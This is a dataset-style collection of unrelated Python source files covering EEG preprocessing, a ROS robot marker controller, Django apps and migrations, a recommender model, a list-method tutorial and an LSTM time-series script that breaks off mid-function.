text
stringlengths 8
6.05M
|
|---|
from braindecode.online.ring_buffer import RingBuffer
import numpy as np
from braindecode.datahandling.preprocessing import exponential_running_mean,\
exponential_running_var_from_demeaned
class StandardizeProcessor(object):
def __init__(self, factor_new=1e-3, eps=1e-4,
n_samples_in_buffer=10000):
self.factor_new = factor_new
self.eps = eps
self.n_samples_in_buffer = n_samples_in_buffer
def initialize(self, n_chans):
self.running_mean = None
self.running_var = None
self.sample_buffer = RingBuffer(np.zeros((
self.n_samples_in_buffer, n_chans), dtype=np.float32))
self.y_buffer = RingBuffer(np.zeros((
self.n_samples_in_buffer), dtype=np.float32))
def process_samples(self, samples):
standardized_samples = self.update_and_standardize(samples)
self.sample_buffer.extend(standardized_samples)
def update_and_standardize(self, samples):
if self.running_mean is not None:
assert self.running_var is not None
next_means = exponential_running_mean(samples,
factor_new=self.factor_new, start_mean=self.running_mean)
demeaned = samples - next_means
next_vars = exponential_running_var_from_demeaned(demeaned,
factor_new=self.factor_new, start_var=self.running_var)
standardized = demeaned / np.maximum(self.eps, np.sqrt(next_vars))
self.running_mean = next_means[-1]
self.running_var = next_vars[-1]
return standardized
else:
self.running_mean = np.mean(samples, axis=0)
self.running_var = np.var(samples, axis=0)
return (samples - self.running_mean) / np.maximum(self.eps,
np.sqrt(self.running_var))
def get_samples(self, start, stop):
return self.sample_buffer[start:stop]
|
#! /usr/bin/env python
# -*- coding:utf-8 -*-
__author__ = ["Rachel P. B. Moraes", "Fabio Miranda"]
import rospy
import numpy
from numpy import linalg
#import transformations
from tf import TransformerROS
import tf2_ros
import math
from geometry_msgs.msg import Twist, Vector3, Pose, Vector3Stamped
from ar_track_alvar_msgs.msg import AlvarMarker, AlvarMarkers
from nav_msgs.msg import Odometry
from sensor_msgs.msg import Image
from std_msgs.msg import Header
x = 0
y = 0
z = 0
id = 0
tfl = 0
buffer = tf2_ros.Buffer()
# x_desejado = 0.12
#y_desejado = 0.10
# z_desejado = 1.80
def recebe(msg):
global x # O global impede a recriacao de uma variavel local, para podermos usar o x global ja' declarado
global y
global z
global id
for marker in msg.markers:
#x = round(marker.pose.pose.position.x, 2) # para arredondar casas decimais e impressao ficar ok
#y = round(marker.pose.pose.position.y, 2)
#z = round(marker.pose.pose.position.z, 2)
x = numpy.longdouble(marker.pose.pose.position.x)
y = numpy.longdouble(marker.pose.pose.position.y)
z = numpy.longdouble(marker.pose.pose.position.z)
print(type(x))
#print(x)
id = marker.id
#print(marker.pose.pose)
# if id == 5:
# print(buffer.can_transform("base_link", "ar_marker_5", rospy.Time(0)))
# header = Header(frame_id= "ar_marker_5")
# # Procura a transformacao em sistema de coordenadas entre a base do robo e o marcador numero 5
# # Note que para seu projeto 1 voce nao vai precisar de nada que tem abaixo, a
# # Nao ser que queira levar angulos em conta
# trans = buffer.lookup_transform("base_link", "ar_marker_5", rospy.Time(0))
# # Separa as translacoes das rotacoes
# t = transformations.translation_matrix([trans.transform.translation.x, trans.transform.translation.y, trans.transform.translation.z])
# # Encontra as rotacoes
# r = transformations.quaternion_matrix([trans.transform.rotation.x, trans.transform.rotation.y, trans.transform.rotation.z, trans.transform.rotation.w])
# m = numpy.dot(r,t)
# v2 = numpy.dot(m,[0,0,1,0])
# v2_n = v2[0:-1]
# n2 = v2_n/linalg.norm(v2_n)
# cosa = numpy.dot(n2,[1,0,0])
# angulo_marcador_robo = math.degrees(math.acos(cosa))
# print("Angulo entre marcador e robo", angulo_marcador_robo)
def recebe2(msg):
global x # O global impede a recriacao de uma variavel local, para podermos usar o x global ja' declarado
global y
global z
global id
if msg.markers == []:
print("Marker not found!")
for marker in msg.markers:
x = round(marker.pose.pose.position.x * 1e308 *100,2)
y = round(marker.pose.pose.position.y * 1e308 *100,2)
z = round(marker.pose.pose.position.z * 1e308 *1000000000,2)
#print(x)
print(marker.id, "x:", x, " y:", y, " z:", z)
# z = '{0:.315f}'.format(x)
# print(z[311:325])
# print('y',y * 1e308 *100)
if marker.id == 8:
if z < 10:
print('andando pra tras')
pub.publish(Twist(Vector3(-1,-1,0), Vector3(0,0,0)))
elif marker.id == 5:
if x > 3.5 and z > 5:
print('andando pra frente!')
pub.publish(Twist(Vector3(0.5,0.5,0), Vector3(10,0,0)))
if x < 3.5 and z > 5:
pub.publish(Twist(Vector3(0.5,0.5,5), Vector3(0,10,20)))
else:
pub.publish(Twist(Vector3(0,0,0), Vector3(0,0,0)))
#print(marker.pose.pose)
#numpy.longdouble
if __name__=="__main__":
global tfl
global buffer
rospy.init_node("marcador") # Como nosso programa declara seu nome para o sistema ROS
recebedor = rospy.Subscriber("/ar_pose_marker", AlvarMarkers, recebe2) # Para recebermos notificacoes de que marcadores foram vistos
pub = rospy.Publisher("cmd_vel", Twist, queue_size=3)
# velocidade_saida = rospy.Publisher("/cmd_vel", Twist, queue_size = 1) # Para podermos controlar o robo
tfl = tf2_ros.TransformListener(buffer) # Para fazer conversao de sistemas de coordenadas - usado para calcular angulo
try:
# Loop principal - todo programa ROS deve ter um
while not rospy.is_shutdown():
a = None
rospy.sleep(1)
except rospy.ROSInterruptException:
print(" programa encerrado")
|
import sys
import os
import time
from asignacion_de_residencias import *
if len(sys.argv) != 5:
if len(sys.argv) == 2 and (sys.argv[1] == "-h" or sys.argv[1] == "--help"):
print "\nPara correr el programa se necesitan 4 parametros:\n" \
"\t-1.El nombre del archivo a crearse en la entrada\n" \
"\t-2.El numero m de hospitales\n" \
"\t-3.El numero n de pacientes\n" \
"\t-4.El nombre del archivo de salida\n" \
"Un ejemplo que corre correctamente es (desde la carpeta src):\n" \
"\tpython correr_asignacion.py 'in.txt' 100 100 'out.txt'\n " \
"Recuerde revisar en las carpetas in/ y out/ para ver los archivos correspondientes"
else:
print "Revise que esten bien las entradas. Para mas ayuda ingrese -h o --help"
exit()
cwd = os.getcwd().split('/')
if cwd[len(cwd) - 1] != "src":
print "El programa debe ser corrido desde la carpeta 'src' del proyecto"
exit()
nombre_archivo_problema = "../in/" + sys.argv[1]
nombre_archivo_salida = "../out/" + sys.argv[4]
m = sys.argv[2]
n = sys.argv[3]
crear_archivo_problema(nombre_archivo_problema, m, n)
start = time.time()
resolver_archivo_problema_con_archivo_salida(nombre_archivo_problema, nombre_archivo_salida)
end = time.time()
print("El problema de asignacion " + sys.argv[1] + " tardo " + str(end - start))
|
from django.shortcuts import render
def sample_task(request):
# Save true values of Channels and Functions in session.
request.session['trigger_channel'] = 'Facebook'
request.session['action_channel'] = 'Dropbox'
request.session['trigger_fn'] = 'new_photo_post_by_you'
request.session['action_fn'] = 'add_file_from_url'
description = "When I add a photo on Facebook, save it to Dropbox."
channels = ["Facebook", "Dropbox"]
trigger_fns = ["new_status_message_by_you",
"new_status_message_by_you_with_hashtag",
"new_link_post_by_you",
"new_link_post_by_you_with_hashtag",
"new_photo_post_by_you",
"new_photo_post_by_you_with_hashtag",
"new_photo_post_by_you_in_area"]
action_fns = ["add_file_from_url", "create_a_text_file",
"append_to_a_text_file"]
context = {'channels': channels, 'trigger_fns': trigger_fns,
'action_fns': action_fns, 'description': description}
return render(request, 'turk/sample_task.html', context)
def sample_conversation(request):
description = "When I add a photo on Facebook, save it to Dropbox."
trigger_channel = "Facebook"
action_channel = "Dropbox"
trigger_fn = "new_photo_post_by_you"
action_fn = "add_file_from_url"
context = {'trigger_channel': trigger_channel, 'trigger_fn': trigger_fn,
'action_channel': action_channel, 'action_fn': action_fn,
'description': description}
return render(request, 'turk/sample_conversation.html', context)
|
import logging
import sys
import inject
import datetime
sys.path.insert(0,'../../../python')
from model.config import Config
logging.getLogger().setLevel(logging.INFO)
from autobahn.asyncio.wamp import ApplicationSession
from asyncio import coroutine
'''
python3 getWorkedOvertimePeriod.py date1 date2
python3 getWorkedOvertimePeriod.py "01/01/2015" "31/12/2015"
'''
def config_injector(binder):
binder.bind(Config,Config('server-config.cfg'))
inject.configure(config_injector)
config = inject.instance(Config)
class WampMain(ApplicationSession):
def __init__(self,config=None):
logging.debug('instanciando WampMain')
ApplicationSession.__init__(self, config)
@coroutine
def onJoin(self, details):
print("********** MINUTOS TRABAJADOS DE REQUERIMIENTOS DE HORAS EXTRAS APROBADAS EN UN PERIODO **********")
if len(sys.argv) < 3:
sys.exit("Error de parámetros")
dateAux = sys.argv[1]
date1 = datetime.datetime.strptime(dateAux, "%d/%m/%Y").date()
dateAux = sys.argv[2]
date2 = datetime.datetime.strptime(dateAux, "%d/%m/%Y").date()
requests = yield from self.call('overtime.getOvertimeRequests', [], ["APPROVED"])
usersId = []
for request in requests:
if request["user_id"] not in usersId:
usersId.append(request["user_id"])
users = yield from self.call('users.findUsersByIds', usersId)
toPrint = []
for user in users:
requests = yield from self.call('overtime.getOvertimeRequests', [user["id"]], ["APPROVED"])
seconds = 0
if len(requests) == 0:
continue;
for request in requests:
dateAuxStr = request["begin"]
dateAux = dateAuxStr[:10]
date = datetime.datetime.strptime(dateAux, "%Y-%m-%d").date()
if(date >= date1) and (date <= date2):
seconds += yield from self.call('overtime.getWorkedOvertime', user["id"], date)
if seconds > 0:
append = user["id"] + ", " + user["name"] + ", " + user["lastname"] + ", " + user["dni"] + ", " + str(round(seconds/3600))
toPrint.append(append)
for pr in toPrint:
print(pr)
sys.exit()
if __name__ == '__main__':
from autobahn.asyncio.wamp import ApplicationRunner
from autobahn.wamp.serializer import JsonSerializer
url = config.configs['server_url']
realm = config.configs['server_realm']
debug = config.configs['server_debug']
json = JsonSerializer()
runner = ApplicationRunner(url=url,realm=realm,debug=debug, debug_wamp=debug, debug_app=debug, serializers=[json])
runner.run(WampMain)
|
import getopt
import sys
import os
import tensorflow as tf
def parseArgs():
short_opts = 'hw:u:p:t:c:b:v:'
long_opts = ['work-dir=', 'git-user=', 'git-pwd=', 'tfrecord-save-dir=', 'config-dir=', 'ubuntu-pwd=', 'verbose=']
config = dict()
config['work_dir'] = ''
config['tfrecord_save_dir'] = ''
config['config_dir'] = ''
config['git_user'] = ''
config['git_pwd'] = ''
config['ubuntu_pwd'] = ''
config['verbose'] = ''
###check little down for more configs
try:
args, rest = getopt.getopt(sys.argv[1:], short_opts, long_opts)
except getopt.GetoptError as msg:
print(msg)
print(f'Call with argument -h to see help')
exit()
for option_key, option_value in args:
if option_key in ('-w', '--work-dir'):
config['work_dir'] = option_value[1:]
elif option_key in ('-u', '--git-user'):
config['git_user'] = option_value[1:]
elif option_key in ('-p', '--git-pwd'):
config['git_pwd'] = option_value[1:]
elif option_key in ('-t', '--tfrecord-save-dir'):
config['tfrecord_save_dir'] = option_value[1:]
elif option_key in ('-c', '--config-dir'):
config['config_dir'] = option_value[1:]
elif option_key in ('-b', '--ubuntu-pwd'):
config['ubuntu_pwd'] = option_value[1:]
elif option_key in ('-v', '--verbose'):
if option_value[1:] == 'False':
config['verbose'] = False
else:
config['verbose'] = True
elif option_key in ('-h'):
print(f'<optional> -w or --work-dir The directory where all work is done. Default: /tmp/work')
print(f'<optional> -u or --git-user The username for github repo')
print(f'<optional> -p or --git-pwd The password for github repo')
print(f'<optional> -c or --config-dir The directory to save config files to run this script twice or more, without \
doing the same packages again')
print(f'<optional> -b or --ubuntu-pwd The ubuntu user password to install packages with apt')
if config['work_dir'] == '':
config['work_dir'] = '/tmp/work/'
if config['tfrecord_save_dir'] == '':
config['tfrecord_save_dir'] = config['work_dir'] + 'tfrecord_files/'
if config['config_dir'] == '':
config['config_dir'] = config['work_dir'] + 'config-files/'
if config['git_user'] == '':
config['git_user'] = ''
if config['git_pwd'] == '':
config['git_pwd'] = ''
if config['ubuntu_pwd'] == '':
config['ubuntu_pwd'] = ''
if config['verbose'] == '':
config['verbose'] = True
###configs without argument, but perhaps depend on configs-with-arguments
config['filtered_out_config_file'] = config['config_dir'] + 'package-filtered-out.txt'
config['package_all_config_file'] = config['config_dir'] + 'package-all.txt'
config['package_work_config_file'] = config['config_dir'] + 'package-work.txt'
config['package_dont_work_config_file'] = config['config_dir'] + 'package-dont-work.txt'
config['package_binaries_config_file'] = config['config_dir'] + 'package-binaries.txt'
return config
def get_all_tfrecord_filenames(tfrecord_file_dir):
files = os.listdir(tfrecord_file_dir)
tfrecord_files = list()
for f in files:
if f.endswith(".tfrecord"):
tfrecord_files.append(f)
return tfrecord_files
def check_config(config):
if not os.path.isdir(config['tfrecord_save_dir']):
print(f"Directory with tfrecord files does not exist >{config['tfrecord_save_dir']}<, check -h for help")
exit()
def print_raw_record(raw_record):
feature_description = {
'func-signature': tf.io.FixedLenFeature([], tf.string, default_value=''),
'func-return-type': tf.io.FixedLenFeature([], tf.string, default_value=''),
'func-name': tf.io.FixedLenFeature([], tf.string, default_value=''),
'func-file-name': tf.io.FixedLenFeature([], tf.string, default_value=''),
'func-att-disas': tf.io.FixedLenFeature([], tf.string, default_value=''),
'func-intel-disas': tf.io.FixedLenFeature([], tf.string, default_value=''),
'ubuntu-package-name': tf.io.FixedLenFeature([], tf.string, default_value=''),
'ubuntu-package-binary': tf.io.FixedLenFeature([], tf.string, default_value=''),
}
ex = tf.io.parse_single_example(raw_record, feature_description)
print(f"func-signature\t---------->\n{ex['func-signature']}<")
print(f"func-return-type\t---------->\n{ex['func-return-type']}<")
print(f"func-name\t---------->\n{ex['func-name']}<")
print(f"func-file-name\t---------->\n{ex['func-file-name']}<")
print(f"func-att-disas\t---------->\n{ex['func-att-disas']}<")
print(f"func-intel-disas\t---------->\n{ex['func-intel-disas']}<")
print(f"ubuntu-package-name\t---------->\n{ex['ubuntu-package-name']}<")
print(f"ubuntu-package-binary\t---------->\n{ex['ubuntu-package-binary']}<")
#return ex['caller_callee'], ex['label']
def main():
config = parseArgs()
check_config(config)
tfrecord_files = get_all_tfrecord_filenames(config['tfrecord_save_dir'])
for file in tfrecord_files:
print(f"Printing 5 examples from >{config['tfrecord_save_dir'] + file}<")
dataset = tf.data.TFRecordDataset(config['tfrecord_save_dir'] + file)
for raw_record in dataset.take(3):
example = tf.train.Example()
example.ParseFromString(raw_record.numpy())
print(f'Example >{example}<')
print_raw_record(raw_record)
exit()
if __name__ == "__main__":
main()
|
# list
kursus = ['masak', 'jahit', 'mengemudi','komputer', 'matematika']
pelajaran = ['matematika', 'bahasa indonesia', 'sejarah','ppkn']
# akses data berdasarkan index pertama
print(kursus[0])
# akses data berdasarkan index terakhir, jika tidak tahu index terakhirnya
print(kursus[-1])
# akses data hanya berdasarkan slicing index
print(kursus[1:4])
# akses data memakai slicing dengan parameter ke 3 yaitu step/skip parameter
print(kursus[::2])
# menampilkan data dari value awal ke akhir
print(kursus[:])
# menampilkan data dari value akhir ke awal dengan slicing dan parameter step
print(kursus[::-1])
# menganti data
kursus[2] = 'komputer'
kursus[3] = 'mengemudi'
print(kursus)
# menambahkan data ke list, masuk di index terakhir
kursus.append('nonton')
print(kursus)
# menambahkan 2 list jadi 1 list
# kursus.append(pelajaran)
# print(kursus[:])
# untuk mengakses data list dalam list
print(kursus[-1])
# menambahkan data ke list, dengan memasukkan di posisi yang kita tentukan. parameter yang dibutuhkan ada 2 yaitu no
# indexnya dan valuenya
kursus.insert(3, 'main bola')
print(kursus)
# menambahkan 2 list ke dalam 1 list tanpa membuat list dalam list. untuk akses nya sama dengan akses list seperti biasa
kursus.extend(pelajaran)
print(kursus)
# menampilkan data dari akhir ke awal dengan cara reverse bukan dengan slicing
kursus.reverse()
print(kursus)
# menghapus list dengan pop, yaitu menghapus dari value akhir
kursus.pop()
print(kursus)
# untuk mengetahui value apa yang diambil dengan pop yaitu dengan menaruh di variable
pop = kursus.pop()
print(pop)
print(kursus)
# menghapus list dengan remove, method ini harus memakai value yang akan dihapus, tidak berdasarkan index
kursus.remove('ppkn')
print(kursus)
# menghapus semua valunya dalam list
# print(kursus.clear())
# menghitung jumlah element di list, jika ada element yang sama, jika tidak ada maka akan menghasilkan not defined
print(kursus.count('matematika'))
# mencari index berdasarkan valuenya yang ada di dalam list, cara ini berguna ketika kita ingin tahu dimana
# sebenarnya posisi index suatu value, setelah ketemu kita lakukan cara-cara yang lain
print(kursus.index('main bola'))
# sorting / mengurutkan element list. jika alphabet maka urutan dari a-z untuk huruf pertama, jika angka maka urutan
# dari 0-9 untuk angka pertama
kursus.sort()
print(kursus)
# WRAPPER DESCRIPTOR
# menambahkan dua list menjadi satu, hampir sama dengan extend
print(kursus.__add__(pelajaran))
# method ini bagus untuk pengecekan apakah elemen value ada dalam list
print(kursus.__contains__('ppkn'))
# method ini belum paham
# print(kursus.__delattr__())
# menhapus item, hampir sama dengan remove
kursus.__delitem__(3)
print(kursus)
# membandingkan value atau element, string juga bisa, jika tidak sesuai dengan typenya akan menghasilkan NotImplemented
print('matematika'.__eq__('matematika'))
print(kursus.__eq__(kursus))
print(kursus.__eq__(pelajaran))
print(kursus.__eq__('matematika'))
# method wrapper ini belum diketahui cara pakainya
# print(kursus.__format__(kursus))
# print(help('FORMATTING'))
# perbandingan 'greater equal' >=
print(kursus.__ge__(kursus))
# method ini belum paham
# print(kursus.__getattribute__('matematika'))
# print(kursus.__setattr__('music', 'pop'))
# akses data hampir sama dengan slicing kursus[5], berdasarkan index tapi agak susah untuk memakai slicing
print(kursus.__getitem__(6))
# comparison 'greater than' >
print(kursus.__gt__(kursus))
# menambahkan item ke list, hampir sama dengan append, insert, tapi jika tidak dimasukkan ke dalam list,
# valuenya akan menjadi pisah-pisah
print(kursus.__iadd__(['olahraga']))
# mengalikan tiap element sesuai dengan parameter yang dispesifikasi, hampir sama dengan var *= var
print(kursus.__imul__(1))
print(kursus.__mul__(2))
print(kursus.__rmul__(2))
# hampir sama dengan akses variable, __iter__ akan memunculkan nilai valuenya
a = kursus
a.__iter__()
print(a)
# comparison less equal to '<='
print(kursus.__le__(kursus))
print(kursus.__lt__(kursus))
# hampir sama dengan len()
print(kursus.__len__())
# comparison, hampir sama dengan != atau not equal
print(kursus.__ne__(pelajaran))
# helper untuk pickle, belum mengerti cara implementasinya
# print(kursus.__reduce__())
# print(kursus.__reduce_ex__())
# hampir sama dengan str()
print(kursus.__repr__())
# hampir sama dengan reverse atau reversed tapi harus pakai list method atau pakai for loop
print(list(kursus.__reversed__()))
# for i in kursus.__reversed__():
# print(i)
# __setitem__ hampir sama re assign dict secara standart, a['music'] = 'dangdut'
a = {'music': 'rock'}
print(a)
a.__setitem__('music', 'pop')
print(a)
a['music'] = 'dangdut'
print(a)
# mengecek jumlah ukuran byte variable dalam memory, jika dicek kedua variabel di bawah ini, akan mempunyai jumalh
# byte yang berbeda
print(a.__sizeof__())
print(kursus.__sizeof__())
|
#coding:utf8
from base.IterativeRecommender import IterativeRecommender
import math
import numpy as np
from tool import qmath
from random import choice
from tool.qmath import sigmoid
from math import log
from collections import defaultdict
from scipy.sparse import *
from scipy import *
class WRMF(IterativeRecommender):
def __init__(self,conf,trainingSet=None,testSet=None,fold='[1]'):
super(WRMF, self).__init__(conf,trainingSet,testSet,fold)
def initModel(self):
super(WRMF, self).initModel()
self.X=self.P*10
self.Y=self.Q*10
self.m = self.data.getSize('user')
self.n = self.data.getSize(self.recType)
def buildModel(self):
userListen = defaultdict(dict)
for user in self.data.userRecord:
for item in self.data.userRecord[user]:
if item[self.recType] not in userListen[user]:
userListen[user][item[self.recType]] = 0
userListen[user][item[self.recType]] += 1
print ('training...')
iteration = 0
while iteration < self.maxIter:
self.loss = 0
YtY = self.Y.T.dot(self.Y)
I = np.ones(self.n)
for user in self.data.name2id['user']:
#C_u = np.ones(self.data.getSize(self.recType))
H = np.ones(self.n)
val = []
pos = []
P_u = np.zeros(self.n)
uid = self.data.getId(user,'user')
for item in userListen[user]:
iid = self.data.getId(item,self.recType)
r_ui = userListen[user][item]
pos.append(iid)
val.append(10*r_ui)
H[iid]+=10*r_ui
P_u[iid]=1
error = (P_u[iid]-self.X[uid].dot(self.Y[iid]))
self.loss+=pow(error,2)
#sparse matrix
C_u = coo_matrix((val,(pos,pos)),shape=(self.n,self.n))
A = (YtY+np.dot(self.Y.T,C_u.dot(self.Y))+self.regU*np.eye(self.k))
self.X[uid] = np.dot(np.linalg.inv(A),(self.Y.T*H).dot(P_u))
XtX = self.X.T.dot(self.X)
I = np.ones(self.m)
for item in self.data.name2id[self.recType]:
P_i = np.zeros(self.m)
iid = self.data.getId(item, self.recType)
H = np.ones(self.m)
val = []
pos = []
for user in self.data.listened[self.recType][item]:
uid = self.data.getId(user, 'user')
r_ui = self.data.listened[self.recType][item][user]
pos.append(uid)
val.append(10*r_ui)
H[uid] += 10*r_ui
P_i[uid] = 1
# sparse matrix
C_i = coo_matrix((val, (pos, pos)),shape=(self.m,self.m))
A = (XtX+np.dot(self.X.T,C_i.dot(self.X))+self.regU*np.eye(self.k))
self.Y[iid]=np.dot(np.linalg.inv(A), (self.X.T*H).dot(P_i))
#self.loss += (self.X * self.X).sum() + (self.Y * self.Y).sum()
iteration += 1
print ('iteration:',iteration,'loss:',self.loss)
# if self.isConverged(iteration):
# break
def predict(self, u):
'invoked to rank all the items for the user'
u = self.data.getId(u,'user')
return self.Y.dot(self.X[u])
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2018-08-06 12:53
from __future__ import unicode_literals
from django.db import migrations, models
import user_input.models
class Migration(migrations.Migration):
dependencies = [
('user_input', '0053_dailyuserinputstrong_activities'),
]
operations = [
migrations.AlterField(
model_name='dailyuserinputencouraged',
name='hr_level',
field=models.CharField(blank=True, max_length=10, validators=[user_input.models.CharMinValueValidator(45), user_input.models.CharMaxValueValidator(220)]),
),
migrations.AlterField(
model_name='dailyuserinputencouraged',
name='lowest_hr_during_hrr',
field=models.CharField(blank=True, max_length=10, validators=[user_input.models.CharMinValueValidator(45), user_input.models.CharMaxValueValidator(220)]),
),
migrations.AlterField(
model_name='dailyuserinputencouraged',
name='lowest_hr_first_minute',
field=models.CharField(blank=True, max_length=10, validators=[user_input.models.CharMinValueValidator(45), user_input.models.CharMaxValueValidator(220)]),
),
]
|
from abc import ABC, abstractmethod
# Абстрактный класс для проверки синтаксиса
class SyntaxChecker(ABC):
def __init__(self):
super().__init__()
# Проверка синтаксиса, где
# fileName (str) - имя файла
# fileContent (str) - содержимое файла
# start (int) - начало проверяемого участка
# end (int) - конец проверяемого участка
# Возвращает
# list со списком ошибок
@abstractmethod
def checkSyntax(self, fileName, fileContent, start, end):
pass
|
from django.conf.urls import url, include
from . import views
urlpatterns = [
url(r'^home/$', views.neighborhood_home, name='home'),
url(r'^status/$', views.neighborhood_status, name='status'),
url(r'^index/$', views.index, name='index'),
url(r'^details/$', views.neighborhood_details, name='details'),
url(r'^get-neighborhoods/$', views.get_neighborhoods, name='get_neighborhoods'),
url(r'^get-event/$', views.get_event, name='get_event'),
url(r'^current-calendar/$', views.get_current_calendar, name='current_calendar'),
url(r'^specific-calendar/$', views.get_specific_calendar, name='specific_calendar'),
url(r'^new-event/$', views.new_event, name='new-event'),
]
|
t,x1,y1,x2,y2 = map(int,input().split())
s = str(input())
a = x2 - x1
b = y2 - y1
from itertools import islice
def nth_index(iterable, value, n):
matches = (idx for idx, val in enumerate(iterable) if val == value)
return next(islice(matches, n-1, n), None)
if a > 0 and b > 0:
f = nth_index(s,'E',a)
l = nth_index(s,'N',b)
if s.count('E') < abs(a) or s.count('N') < abs(b):
final = -1
else:
final = max(f,l)+1
elif a > 0 and b < 0 :
f = nth_index(s,'E',abs(a))
l = nth_index(s,'S',abs(b))
if s.count('E') < abs(a) or s.count('S') < abs(b):
final = -1
else:
final = max(f,l)+1
elif a < 0 and b > 0:
f = nth_index(s,'W',abs(a))
l = nth_index(s,'N',abs(b))
if s.count('W') < abs(a) or s.count('N') < abs(b):
final = -1
else:
final = max(f,l)+1
elif a < 0 and b < 0:
f = nth_index(s,'W',abs(a))
l = nth_index(s,'S',abs(b))
if s.count('W') < abs(a) or s.count('S') < abs(b):
final = -1
else:
final = max(f,l)+1
elif a > 0 and b == 0:
f = nth_index(s,'E',abs(a))
if s.count('E') < abs (a):
final = -1
else:
final = f+1
elif a < 0 and b == 0:
f = nth_index(s,'W',abs(a))
if s.count('W') < abs (a):
final = -1
else:
final = f+1
elif a == 0 and b > 0:
f = nth_index(s,'N',abs(b))
if s.count('N') < abs (b):
final = -1
else:
final = f+1
elif a == 0 and b < 0:
f = nth_index(s,'S',abs(b))
if s.count('S') < abs (b):
final = -1
else:
final = f+1
print(final)
|
# Generated by Django 2.0.3 on 2018-04-08 10:59
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('recipes', '0005_auto_20180408_1041'),
]
operations = [
migrations.RemoveField(
model_name='medicinerequest',
name='medicine_request_status',
),
migrations.AddField(
model_name='medicinerequest',
name='given_medicine',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='recipes.Medicine'),
),
]
|
from django.contrib.auth.models import User, AbstractUser
from django.db import models
from mptt.fields import TreeManyToManyField
from django.urls import reverse
from listy.models import Category
from django.conf import settings
from django.contrib.auth import get_user_model
#
class ProfilManager(models.Manager):
pass
# Create your models here.
class Profil(models.Model):
user = models.OneToOneField(User, null=True, on_delete=models.CASCADE)
email_confirmed = models.BooleanField(default=False)
imie = models.CharField(max_length=50, null=True, blank=True, default="")
nazwisko = models.CharField(max_length=50, null=True, blank=True, default="")
profilimg = models.ImageField(upload_to='media/profiles/', blank=True, null=True, default='media/1.jpg')
opis = models.TextField(blank=True)
kategoria= models.ForeignKey(Category, verbose_name="Kategoria", null=True, blank=True, on_delete=models.DO_NOTHING)
kod = models.DecimalField(max_digits=6, decimal_places=0, null=True, blank=True)
strona = models.CharField(max_length=255, null=True, blank=True, default="np www.mojadomena.pl")
telefon = models.CharField(max_length=50, null=True, blank=True, default="")
profesja = models.CharField(max_length=50, null=True, blank=True, default="")
miasto = models.CharField(max_length=50, null=True, blank=True, default="")
port1 = models.ImageField(upload_to='media/portfolio/', blank=True, null=True, default='media/1.jpg', verbose_name="galeria zdjęcie nr 1")
port2 = models.ImageField(upload_to='media/portfolio/', blank=True, null=True, default='media/1.jpg', verbose_name="galeria zdjęcie nr 2")
port3 = models.ImageField(upload_to='media/portfolio/', blank=True, null=True, default='media/1.jpg', verbose_name="galeria zdjęcie nr 3")
port4 = models.ImageField(upload_to='media/portfolio/', blank=True, null=True, default='media/1.jpg', verbose_name="galeria zdjęcie nr 4")
port5 = models.ImageField(upload_to='media/portfolio/', blank=True, null=True, default='media/1.jpg', verbose_name="galeria zdjęcie nr 5")
class Meta:
verbose_name = "Profil"
verbose_name_plural = "Profile"
def __str__(self):
return f'{self.user.username}'
def get_absolute_url(self):
return reverse('profil_view', args=[str(self.id)])
|
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.callbacks import EarlyStopping
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error
import os, math
import keras.backend as K
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.style as style
style.use('fivethirtyeight')
#print(style.available)
def loadData(link):
data = pd.read_csv(link)
datetimeColName = data.columns[0]
data[datetimeColName] = pd.to_datetime(data[datetimeColName])
data.set_index(datetimeColName, inplace=True)
data.sort_index()
return data
def scale_to_0and1(data):
scaler = MinMaxScaler(feature_range=(0, 1)) # MinMax Scaler
data = scaler.fit_transform(data) # input: ndarray type data
return(data, scaler)
# split into train and test sets
def splitData(data, trainPercent=0.7, split_by_time=False, split_date=None):
if split_by_time is False:
train_size = int(len(data) * trainPercent)
train_data, test_data = data.iloc[0:train_size,], data.iloc[train_size:,]
print("\n", "train length:", len(train_data),"\n", "test length:", len(test_data))
elif split_by_time is True:
# split_date = pd.Timestamp("01-01-2011")
split_date = split_date
train_data = data.ix[:split_date, :]
train_data.drop(split_date, axis=0, inplace=True)
test_data = data.ix[split_date:, :]
return(train_data, test_data)
def reshapeForLSTM(data, time_steps=None):
"""
:param data: intput data
:param time_steps: time steps after
:return: reshaped data for LSTM
"""
"""
The LSTM network expects the input data (X)
to be provided with
a specific array structure in the form of:
[samples, time steps, features].
"""
if time_steps is None:
print("please denote 'time_steps'...!")
return(None)
else:
data_reshaped = np.reshape(data, (data.shape[0], time_steps, 1))
return(data_reshaped)
# --- create dataset with window size --- #
def sequentialize(scaled_inputData, inputData_index, window_size=None, to_ndarray=False):
if window_size is None:
print("\n", "please use 'window_size'...!")
return(None)
elif isinstance(window_size, int):
# change type to use 'shift' of pd.DataFrame
scaled_inputData = pd.DataFrame(scaled_inputData, columns=["value"], index=inputData_index)
# dataframe which is shifted as many as window size
for idx in range(1,window_size+1):
scaled_inputData["before_{}".format(idx)] = scaled_inputData["value"].shift(idx)
# drop na
inputSequence = scaled_inputData.dropna().drop('value', axis=1)
output = scaled_inputData.dropna()[['value']]
if to_ndarray is False:
return(inputSequence, output)
else:
inputSequence = inputSequence.values
output = output.values
return(inputSequence, output)
### training with different params sets (epochs + batch size). and save error scores.
### We can choose smallest error score params set to apply to model
def optimizing(X_train, y_train,X_test, y_test, epochs, batch_size):
error_scores = pd.DataFrame(columns=['epochs','batch_size','RMSE'])
for e in epochs:
for b in batch_size:
# --- train LSTM network --- #
# todo: what "K.clear_session()" do...?
K.clear_session()
model = Sequential()
model.add(LSTM(units=20, input_shape=(12, 1))) # (timestep, feature)
model.add(Dense(units=1)) # output = 1
model.compile(loss="mean_squared_error", optimizer="adam")
model.summary()
# todo: inspect "EarlyStopping function()"
early_stop = EarlyStopping(monitor="loss", patience=1, verbose=1)
# todo: make loss list & accumulate loss value to loss list
# todo: & plot lost list
model.fit(X_train, y_train, epochs=e, batch_size=b, verbose=2, callbacks=[early_stop])
# todo: check 'why full iteration is stopped'
# --- predict LSTM network --- #
# todo: fix codes below...!
trainPred = model.predict(X_train)
trainPred = scaler.inverse_transform(trainPred)
trainY = scaler.inverse_transform(y_train)
testPred = model.predict(X_test)
